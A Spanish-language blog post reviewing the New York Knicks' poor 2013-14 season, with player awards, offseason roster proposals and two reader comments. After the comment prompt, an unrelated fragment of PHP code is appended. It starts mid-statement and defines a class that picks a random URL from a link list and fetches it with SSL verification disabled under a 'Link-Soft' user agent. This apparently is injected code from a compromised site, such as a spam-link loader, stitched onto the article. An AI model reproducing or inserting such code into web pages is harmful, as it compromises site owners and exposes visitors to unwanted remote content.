New York Knicks: Muy deficiente

08 de July de 2014 por TheDeerHunter

No hay dos sin tres y esta campaña ha sido excepcionalmente catastrófica para los tres equipos con más solera de la liga. Nunca antes habíamos asistido a unos resultados tan malos en una misma temporada de Lakers, Celtics y Knicks. Mayor tragedia si cabe para el equipo de la gran manzana que venían de completar el año anterior su mejor campeonato de lo que va de siglo y que se han encontrado sin ninguna elección en primera ronda para el reciente draft. Sin buen presente, con futuro incierto a corto plazo y unos éxitos pasados cada vez más difusos en la memoria… “papá, ¿por qué somos de los Knicks?”

Aunque ni en nuestras peores pesadillas podíamos imaginar un batacazo de tal calibre anticipábamos un año complicado para ellos. Creímos apreciar un mayor nivel general de la conferencia y pensamos que no se habían reforzado convenientemente. Al final no fue tal, pero ni Woodson logró dar con la tecla ni sus jugadores lograron estar a una altura tan asequible. Han vuelto a ser uno de los equipos más individualistas de la liga, uno de los peores reboteadores y tampoco han anotado con fluidez, por debajo de los 100 puntos de promedio. Sin embargom curiosamente han sido el 8º equipo que menos puntos han encajado, lo poco salvable de un curso patético. Fue una anomalía y una injusticia que tuvieran opciones para playoffs hasta casi el final. Jamás merecieron ese premio. 

El análisis nombre a nombre de la plantilla merece capítulo aparte. Un desempeño bochornoso de algunos hombres clave, indignos de vestir esa ilustre camiseta e incluso de llamarse profesionales: Cuesta creer que JR Smith sea el mismo jugador que logró el premio al mejor 6º hombre el curso pasado, aunque siempre tuvo tendencia a dispersarse; hemos visto un Raymond Felton pasado de kilos, arrastrándose como uno de los peores bases de la competición; nos preguntamos en qué se parece el inoperante Iman Shumphert al jugador que apuntaba hace no demasiado tiempo; qué queda del pura sangre Metta World Peace que contagiaba a todos su intensidad… Incluso gente habitualmente cumplidora como Pablo Prigioni o Kenyon Martin terminaron contagiados por el ambiente de indolencia general y jugadores como Earl Clark o Shannon Brown aportaron… básicamente nada. Y todo sin mencionar los problemas físicos de Andrea Bargnani, Tyson Chandler o, por supuesto, Amare Stoudemire. Lo que les faltaba a los Knicks: una devaluación general de sus activos para complicar todavía más si cabe su situación. De la quema podemos salvar al propio Stat, que con minutos limitados ha vuelto a demostrar gran utilidad; a Carmelo Anthony que, aunque parezca mentira, ha cuajado uno de sus años más completos; destellos de Tim Hardaway Jr.  y los 55 partidos que ha podido disputar Chandler. Para de contar.

La única gran satisfacción que se han podido tirar a la cara los sufridos aficionados Knickerbockers ha sido lograr la vuelta a la actividad de toda una leyenda viva como Phil Jackson, debutando a sus 68 años como General Manager. El desafío es de aúpa pero si hay un nombre ligado a los buenos resultados en esta competición ese es el del viejo maestro “Zen”. De momento ya ha dejado su sello en el fichaje de Dereck Fisher como primer entrenador y de Kurt Rambis como asistente. Llega el triángulo ofensivo a la gran manzana.

PREMIOS

MVP: Fabulosa temporada de Carmelo Anthony, más eficaz ofensivamente que el curso pasado y mejorando significativamente en su faceta reboteadora. Aunque siempre hemos sido muy críticos con él no se le puede pedir mucho más. Es imprescindible para la nueva era que se avecina.

Rookie: Tim Hardaway Jr ha sido una de las grandes sensaciones del año en Nueva York y uno de los mejores novatos de la hornada. Le ha faltado algo de presencia aunque es previsible que a corto plazo adquiera galones. Habrá que comprobar cómo se adapta al triángulo ofensivo pero sus cualidades de eficaz tirador le avalan.

Sorpresa: No confiábamos demasiado en la aportación de Amare Stoudemire al principio de curso tras los rumores que apuntaban que estaba esencialmente cojo. Le ha sentado muy bien la regulación de minutos que le han planteado y ha vuelto a ser, no sólo útil sinó extremadamente productivo.

Decepción: Tras 10 años en la liga no se puede decir que JR Smith sea un chiquillo que no sepa lo que hace. Con todo a su favor para ser importante en esta liga parece empeñado en demostrar lo contrario. Tras una temporada 2012/13 excelente, con merecido premio de mejor sexto hombre, pronto volvió a las andadas. La irregularidad de su juego es un espejo de su carácter. A sus 28 años su inmadurez y falta de profesionalidad apuntan a crónicas y su carrera a intrascendente. En otro orden de cosas es una lástima que Raymond Felton haya cerrado su etapa en la gran manzanda de forma tan lamentable.

Esfuerzo en vano: Mike Woodson ha sido el gran damnificado de la desastrosa campaña. Es comprensible que no siga en el cargo atendiendo a los recientes resultados pero no podemos olvidar que también es el único que en la última década ha logrado hacerles parecer un equipo serio.

JUGANDO A GM

El verano 2014 gira, como no puede ser de otra manera, en torno a la renovación de Carmelo Anthony, que renunció a su player option. El jugador es más importante para el futuro inmediato de la franquicia de lo que parece, pues cuenta con derechos Bird que facilitarían mucho la cuestión salarial. La ventaja sobre el resto de competidores es que pueden ofrecerle el máximo de, nada menos, casi 130 millones en 5 temporadas, cifras que convencerían a cualquiera. Sin embargo, el jugador continúa deshojando la margarita ante las lógicas dudas sobre si los Knicks serán capaces de montar un proyecto ambicioso ya mismo. Teniendo en cuenta que parece que se lo están rifando mano a mano con los Lakers, tiran más 130 kilos que dos carretas y es de esperar que el jugador termine quedándose en New York.

Parece ser que la política que ha instaurado Phil Jackson es la de las estrellas llaman a las estrellas y hemos visto que están tirando la casa por la ventana de una forma casi suicida, contactando simultáneamente con otros cotizados agentes libres como el mismísimo LeBron James y Pau Gasol. Si lo del primero tiene demasiada pinta de ser un brindis al sol lo del catalán parece que se lo han tomado en serio y tanto Melo como los ex Lakers del actual organigrama de la franquicia están tratando de atraerlo al proyecto. Por sus características y por su conocimiento del triángulo ofensivo sería un fichaje fantástico. Mientras nadie nos explique cómo se encuadraría dentro del complicado puzle salarial que tienen montado no creeremos esa posibilidad.

En la línea de convencer a Gasol también parece estar el traspaso más reciente. A cambio de Tyson Chandler y Raymond Felton llegaron Jose Calderon, Samuel Dalembert, Shane Larkin y Wayne Ellington, además de un par de segundas rondas. Aunque Phil Jackson nunca ha sido muy amigo de los bases distribuidores con este movimiento mata varios pájaros de un tiro. Además de lo de convencer a Pau, Calderon es un jugador inteligente, buen tirador, que puede ser muy útil en el triángulo y que además cubre una posición tradicionalmente maldita en aquel equipo. Como anécdota se cierra el círculo con el reencuentro de Calderon y Prigioni después de 8 años. También ganan flexibilidad con el expiring de Sammy Dalembert y los contratos manejables de Ellington y Larkin. Además, llegan los rookies de segunda ronda Thanasis Antetokoumpo, Louis Labeyrie y Cleanthony Early que completarán el roster pero serán carne de cañón de algún traspaso o se irán de cabeza a la liga de desarrollo.

Sobre las salidas más inmediatas es difícil que ejerzan la Team option sobre Dalembert. Aunque es un hombre cumplidor, no casa demasiado bien con la actual filosofía. Ya se anunció que tampoco se efectuaría la Qualifying offer sobre Toure Murry y todo indica que el jugador también se irá. Iman Shumpert tiene contrato garantizado, pero habría que encontrarle como sea un nuevo acomodo lejos del Madison. De pensar en renovaciones me quedaría seguro con Kenyon Martin y, quizá Jeremy Tyler para reforzar la posición de center, siempre que salgan por el mínimo de veteranos.

En este punto, asumiendo que para fichar únicamente disponemos de la mini mid-level exception ($3.3 millones anuales) iría de cabeza a por Jordan Hill, un jugador que empezó a dar excelentes resultados bajo las órdenes de Phil Jackson. Hasta ahora se ha movido por ese tramo salarial, pero no será difícil que alguien le ofrezca algo más.

Con todo esto quedaría un equipo de playoffs en el Este con la gorra, a la espera de liberar el verano que viene 35 millones entre Bargnani y Stat. Entonces sí sería el momento de atraer alguna/s pieza/s verdaderamente interesante/s para terminar de darle forma a todo un candidato al anillo.

PG: Jose Calderon, Pablo Prigioni, Shane Larkin
SG: Tim Hardaway Jr, Jr Smith, Wayne Ellington
SF: Carmelo Anthony, Thanasis Antetokoumpo, Cleanthony Early
PF: Amar’e Stoudemire, Kenyon Martin, Louis Labeyrie,
C: Jordan Hill, Andrea Bargnani, Jeremy Tyler

Comenta

2 comentarios a esta entrada

  1. Vader dice:
    #1

    Pues si, muy de acuerdo con todo el análisis. Casi todo lo que podía salir mal salió mal. Felton fuera de forma, Tyson Chandler con muchas lesiones y JR Smith volviendo a las andadas. Este año se ha echado mucho de menos su extraordinario rendimiento de la pasada campaña. Cuando este centrado es uno de los mejores escoltas de la competición, por capacidad física y talento. Relacionado con el rendimiento de JR Smith y Felton creo que también se echo mucho de menos algunos de los veteranos que dejaron el equipo, Jason Kidd, Shed Wallace, Kurt Thomas, etc…

    Para añadir malas noticias que no se han dicho en el análisis, Shumpert se ha estancado. Sigue siendo un buen defensor y parece que físicamente esta bien después de su grave lesión pero en ataque no ha progresado nada. Este año se supone crucial para él, ya veremos si será en los Knicks o en otra parte.

    Y ya hablando del presente de momento lo que ha hecho Phil Jackson me parece bien, ha venido con pocas ideas básicas y las esta implementando. Jugar con triangulo ofensivo, se han fichado entrenadores y algunos jugadores idoneos para ello e implementar una cultura ganadora en la franquicia. O sea, da igual lo que decida Melo, se intentará tener un equipo mejor cada vez y que la franquicia juegue a ganar siempre tenga más o menos oportunidades. Nada de tanquear, nunca.

    Los rumores apuntan a que los movimientos para persuadir a Melo de renovar serian traspasar a Stat y Bargiani a cambio de espacio salarial, seguramente soltando a Shumpert, Hardaway JR, Larkin o alguna futura ronda para mirar de fichar a uno o varios agentes libres que mejoren el equipo de inmediato. El que más ha sonado en este sentido sería Pau Gasol.

    Veremos en que queda todo, seguramente en las próximas horas saldremos de dudas en el tema Melo y Lebron y el resto de movimientos se sucederán a mucha más velocidad.

    Saludos.

      Citar

  2. Esteban dice:
    #2

    todo lo malo del curso pasado, puede desaparecer de un momento a otro

    increiblemente los Mavs consideran a Chandler un pivote que lo puede llevar al campeonato y un contratazo menos de encima y ensima le metieron a felton en el paquete y se hicieron con calderon! q locuta

    Los 76ers necesitan cumplir con el minimo de salarios y se llevarian los casi 24 millones de amare, y para decorar el arreglo tambien querrian a shumpert, dos menos de un solo tiro

    Carmelo a renunciado a su ultimo año, no es una buena noticia, pero en lo que hace a espacio salarial y planificar un futuro, puede servir

    con el contrato de Smith y su ropl de sexto hombre, tendra compradores si los Knicks pretenden venderlo

    y Bargnani es un expiring, si se sacan la loteria quiza se lo manden junto a una primera ronda a algun equipo que no cubra el minimo salarial, estilo Magic, 76ers, Jazz o al dia de hoy bobcats

    y de pronto, libros limpios y libertad para trabajar para Jackson, cosa que parecia perdida, sea este año o a futuro,

    mas no se podia pedir o si?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>